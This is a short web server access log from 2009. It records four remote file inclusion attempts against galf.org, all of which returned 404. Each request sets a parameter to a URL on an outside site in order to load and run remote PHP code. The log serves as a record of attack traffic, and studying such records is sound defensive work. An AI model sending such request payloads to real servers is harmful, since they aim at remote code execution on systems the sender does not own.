114.108.177.238 - - [22/Nov/2009:23:05:07 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:23:05:09 -0800] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:23:05:09 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.213.119 - - [22/Nov/2009:23:05:09 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
